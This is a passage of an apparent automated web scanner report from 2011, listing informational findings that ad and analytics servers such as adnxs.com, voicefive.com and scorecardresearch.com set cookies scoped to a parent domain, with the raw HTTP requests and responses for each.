Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306&browse_products=160547
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3; T_eel0=eo7%3A861h%3A1; rth=2-ljzkpb-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: image/gif
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Tue, 26 Apr 2011 20:03:22 GMT
Connection: close
Set-Cookie: T_eel0=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_irnh=jxb%3Aaf0c%3A1; Domain=trafficmp.com; Expires=Wed, 25-Apr-2012 20:03:23 GMT; Path=/
Set-Cookie: rth=2-ljzkpb-jxb~af0c~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-; Domain=trafficmp.com; Expires=Wed, 25-Apr-2012 20:03:23 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

13.14. http://ad.trafficmp.com/a/bpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/bpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=652&id=1561&format=image&r= HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3; T_fk5h=jxb%3Aaf0c%3A1; rth=2-ljzkpb-jxb~af0c~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: image/gif
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Tue, 26 Apr 2011 20:03:32 GMT
Connection: close
Set-Cookie: T_fk5h=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_23jg=jxb%3Aaf0m%3A1; Domain=trafficmp.com; Expires=Wed, 25-Apr-2012 20:03:33 GMT; Path=/
Set-Cookie: rth=2-ljzkpb-jxb~af0m~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-; Domain=trafficmp.com; Expires=Wed, 25-Apr-2012 20:03:33 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

13.15. http://ad.trafficmp.com/a/bpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/bpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=652&id=1561&format=image&r= HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3; T_fk5h=jxb%3Aaf0c%3A1; rth=2-ljzkpb-jxb~af0c~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: image/gif
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Tue, 26 Apr 2011 20:03:33 GMT
Connection: close
Set-Cookie: T_fk5h=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_47z9=jxb%3Aaf0m%3A1; Domain=trafficmp.com; Expires=Wed, 25-Apr-2012 20:03:33 GMT; Path=/
Set-Cookie: rth=2-ljzkpb-jxb~af0m~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-; Domain=trafficmp.com; Expires=Wed, 25-Apr-2012 20:03:33 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

13.16. http://adx.adnxs.com/mapuid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adx.adnxs.com
Path:   /mapuid

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mapuid?member=181&user=CAESEAYDROJIBlXAxjjwOAYYXzI&cver=1 HTTP/1.1
Host: adx.adnxs.com
Proxy-Connection: keep-alive
Referer: http://mediacdn.disqus.com/1303851120/build/system/def.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIImdYCEAoYASABKAEw2qLc7QQQ2qLc7QQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG10Qgj[2<?0P(*AuB-u**g1:XICajEhzW()U9M1kUGf3$2.f0R>9.aclgdU%p3G.wsgA#5B^/y'*AHKwd-Wc/<vf>ixo=/N^ErmW.7[DPyOU^$+=btOVCb1#5mb1HtSskQ$#DX%p1anmQi))(EM:>@>i%8Erm#VQ=y1kR1I/m[-YAD8)MvNO9-KB/M=Ph3Gg0XnXoLwvH(1F$*vhmR$21+4gnIPa8ZQ96*JoaM`+tGx4)P'kOBSQ:TDf>[)JB]jN^AZA:`:L7xDM@.[obo(c'Vh#EyvU0In#NhZm]%(05D.!:agr)t[VjlG[PhG1CflaNaIM'U.!TFd(icoIMFD8Ep.IUtn=Zi@9>+M68OhQI0Z*^@!9d[@Qn^sMS^=3<0=o1N6p(m049Jmn`V9t>QhMj!HjDiz3g9e?Iibma^P.CI!sni1i^r+(]67Kw%hg9mr`R>z1NK)67z`.JhV2MJzq$a4wGN/ABy=5j2Xne?bDXi/Su11aLdm/AGUaZ#ErKYEsY^e1(Fc?>]=o<'':M4=2#H)DhRCw#R0T!2U@I</wZn

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 27-Apr-2011 21:51:18 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 21:51:18 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 21:51:18 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 21:51:18 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG10Qgj[2<?0P(*AuB-u**g1:XICajEhzW()U9M1kUGf3$2.f0R>9.aclgdU%p3G.wsgA#5B^/y'*AHKwd-Wc/<vf>ixo=/N^ErmW.7[DPyOU^$+=btOVCb1#5mb1HtSskQ$#DX%p1anmQi))(EM:>@>i%8Erm#VQ=y1kR1I/m[-YAD8)MvNO9-KB/M=Ph3Gg0XnXoLwvH(1F$*vhmR$21+4gnIPa8ZQ96*JoaM`+tGx4)P'kOBSQ:TDf>[)JB]jN^AZA:`:L7xDM@.[obo(c'Vh#EyvU0In#NhZm]%(05D.!:agr)t[VjlG[PhG1CflaNaIM'U.!TFd(icoIMFD8Ep.IUtn=Zi@9>+M68OhQI0Z*^@!9d[@Qn^sMS^=3<0=o1N6p(m049Jmn`V9t>QhMj!HjDiz3g9e?Iibma^P.CI!sni1i^r+(]67Kw%hg9mr`R>z1NK)67z`.JhV2MJzq$a4wGN/ABy=5j2Xne?bDXi/Su11aLdm/AGUaZ#ErKYEsY^e1(Fc?>]=o<'':M4=2#H)DhRCw#R0T!2U@I</wZn; path=/; expires=Mon, 25-Jul-2011 21:51:18 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Tue, 26 Apr 2011 21:51:18 GMT

GIF89a.............!.......,........@..L..;

13.17. http://altfarm.mediaplex.com/ad/js/15902-126860-34879-0  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/15902-126860-34879-0

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/js/15902-126860-34879-0?mpt=4926950&mpvc=http://ad.uk.doubleclick.net/click%3Bh%3Dv8/3af5/3/0/%2a/u%3B240165093%3B0-0%3B0%3B50681866%3B4252-336/280%3B41773561/41791348/1%3B%3B%7Esscs%3D%3f HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo2=16228:26209; mojo3=10105:2060/14302:29115/12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=15902:34879/10105:2060/14302:29115/12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209; expires=Fri, 26-Apr-2013 5:03:12 GMT; path=/; domain=.mediaplex.com;
Location: http://img.mediaplex.com/content/0/15902/126860/hitachi_anywhere336x280.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15902-126860-34879-0%3Fmpt%3D4926950&mpt=4926950&mpvc=http://ad.uk.doubleclick.net/click%3Bh%3Dv8/3af5/3/0/%2a/u%3B240165093%3B0-0%3B0%3B50681866%3B4252-336/280%3B41773561/41791348/1%3B%3B%7Esscs%3D%3f
Content-Length: 0
Date: Tue, 26 Apr 2011 21:50:04 GMT


13.18. http://amch.questionmarket.com/adsc/d840009/7/41115363/decide.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d840009/7/41115363/decide.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d840009/7/41115363/decide.php HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://ad.uk.doubleclick.net/adi/ads.idg.co.uk/cw-welcome;kw=hp-igsusa-apr;sz=640x480;ord=4922060?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=725047-17-3_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1; ES=724925-fwM$M-e1_865756-Ihl$M-0_859330-mt!$M-0_851211-g|0'M-0

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:49:17 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Set-Cookie: CS1=deleted; expires=Mon, 26 Apr 2010 21:49:16 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=725047-17-3_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1; expires=Sat, 16 Jun 2012 13:49:17 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=724925-fwM$M-e1_865756-Ihl$M-0_859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0; expires=Sat, 16-Jun-2012 13:49:17 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Set-Cookie: linkjumptest=1; path=/; domain=.questionmarket.com
Set-Cookie: endsurvey=no; path=/; domain=.questionmarket.com
Content-Length: 1042
Content-Type: text/html

/* b203.dl - Tue Apr 26 12:42:39 EDT 2011 */
(function(){
var d=document,s_id="SafeCount_Link",b;
function z(){
var ifr=(self!=top),sd="",b;

try{
b = top.document.body;
ifr = false;
} catch (e) { }


...[SNIP]...

13.19. http://amch.questionmarket.com/adscgen/st.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adscgen/st.php?survey_num=851211&site=60069804&code=39864914&randnum=6031698 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5092.152847.MICROSOFTADVERTISIN/B5103858.21;sz=300x250;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00047/47000000000040614.1?!&&PID=8370651&UIT=G&TargetID=8192380&AN=2047363577&PG=CP49XU&ASID=592c970828da41888e4fe12bfdeb5382&destination=;ord=2047363577?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=725047-17-3_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1; ES=724925-fwM$M-e1_865756-Ihl$M-0_859330-mt!$M-0

Response

HTTP/1.1 302 Found
Date: Tue, 26 Apr 2011 18:41:37 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
DL_S: b202.dl
Set-Cookie: CS1=deleted; expires=Mon, 26 Apr 2010 18:41:36 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=725047-17-3_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1; expires=Sat, 16 Jun 2012 10:41:37 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=724925-fwM$M-e1_865756-Ihl$M-0_859330-mt!$M-0_851211-n|0'M-0; expires=Sat, 16-Jun-2012 10:41:37 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=DART&survey_num=851211&site=60069804-60069804-&code=39864914
Content-Length: 0
Content-Type: text/html


13.20. http://ar.voicefive.com/b/wc_beacon.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/wc_beacon.pli?n=BMX_G&d=0&v=method-%3E-1,ts-%3E1303842976.104,wait-%3E10000,&1303842986960 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/NYC/iview/296638382/direct;;wi.300;hi.250/01?click=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=24&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 14:21:11 2011&prad=253732015&arc=178113848&; ar_p92429851=exp=1&initExp=Tue Apr 26 18:36:13 2011&recExp=Tue Apr 26 18:36:13 2011&prad=296638382&arc=200925855&; BMX_G=method->-1,ts->1303842973; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 18:36:24 GMT
Content-Type: image/gif
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303842976%2E104%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;
Content-length: 42
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent

GIF89a.............!.......,........@..D.;

13.21. http://ar.voicefive.com/bmx3/broker.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bmx3/broker.pli?pid=p91136705&PRAd=296638381&AR_C=211671727 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/NYC/iview/296638381/direct;;wi.300;hi.250/01?click=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=24&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 14:21:11 2011&prad=253732015&arc=178113848&; ar_p92429851=exp=1&initExp=Tue Apr 26 18:36:13 2011&recExp=Tue Apr 26 18:36:13 2011&prad=296638382&arc=200925855&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303842976%2E104%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 18:40:08 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p91136705=exp=1&initExp=Tue Apr 26 18:40:08 2011&recExp=Tue Apr 26 18:40:08 2011&prad=296638381&arc=211671727&; expires=Mon 25-Jul-2011 18:40:08 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26440

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"296638381",Pid:"p91136705",Arc:"211671727",Location:
...[SNIP]...

13.22. http://ar.voicefive.com/bmx3/broker.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=256163696&AR_C=194941084 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0078565546631069&output=html&h=90&slotname=0597910248&w=728&ea=0&flash=10.2.154&url=http%3A%2F%2Fseclists.org%2Ffulldisclosure%2F2011%2FApr%2F388&dt=1303854583029&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303854583063&frm=1&adk=362780761&ga_vid=81945644.1303854583&ga_sid=1303854583&ga_hid=1074700742&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3993542599&fu=0&ifi=1&dtd=40
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=24&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 14:21:11 2011&prad=253732015&arc=178113848&; ar_p92429851=exp=1&initExp=Tue Apr 26 18:36:13 2011&recExp=Tue Apr 26 18:36:13 2011&prad=296638382&arc=200925855&; ar_p91136705=exp=1&initExp=Tue Apr 26 18:40:08 2011&recExp=Tue Apr 26 18:40:08 2011&prad=296638381&arc=211671727&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 21:52:01 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=25&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 21:52:01 2011&prad=256163696&arc=194941084&; expires=Mon 25-Jul-2011 21:52:01 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303854721; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25333

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"256163696",Pid:"p97174789",Arc:"194941084",Location:
...[SNIP]...

13.23. http://ar.voicefive.com/bmx3/broker.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bmx3/broker.pli?pid=p92429851&PRAd=296638382&AR_C=200925855 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/NYC/iview/296638382/direct;;wi.300;hi.250/01?click=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=24&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 14:21:11 2011&prad=253732015&arc=178113848&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 18:36:13 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p92429851=exp=1&initExp=Tue Apr 26 18:36:13 2011&recExp=Tue Apr 26 18:36:13 2011&prad=296638382&arc=200925855&; expires=Mon 25-Jul-2011 18:36:13 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303842973; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 30464

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"296638382",Pid:"p92429851",Arc:"200925855",Location:
...[SNIP]...

13.24. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?rn=1303842937293&c7=http%3A%2F%2Fwww.msn.com%2F&c1=2&c2=3000001 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Tue, 26 Apr 2011 18:35:28 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Thu, 25-Apr-2013 18:35:28 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
